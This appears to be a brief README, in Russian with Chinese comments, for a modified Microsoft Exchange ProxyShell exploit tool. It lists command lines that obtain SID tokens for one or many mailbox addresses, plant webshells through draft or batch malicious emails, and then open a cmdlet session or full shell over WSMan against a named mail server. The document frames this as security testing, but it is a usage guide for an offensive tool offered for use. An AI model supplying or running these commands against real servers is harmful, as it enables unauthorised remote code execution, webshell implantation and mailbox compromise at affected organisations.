
Проведена вторичная модификация Exchange Proxyshell с точным разделением для реализации вспомогательного тестирования безопасности.
python send_webshell_mail.py https://mail16.echod.com [email protected] 单次获取
python send_webshell_mail.py https://mail16.echod.com crack 批量从 mail.txt 读取邮件地址,尝试获取 SID 令牌
python send_webshell_mail.py https://mail16.echod.com [email protected] send (只发送 webshell 草稿邮件)
python send_webshell_mail.py https://mail16.echod.com crack send 批量发送恶意邮件 (不推荐)
python wsman_shell.py https://mail.echod.com [email protected] [这里替换获取到的令牌] 这里仅进入 cmdlet 执行命令
python wsman_shell.py https://mail.echod.com [email protected] [这里替换获取到的令牌] shell


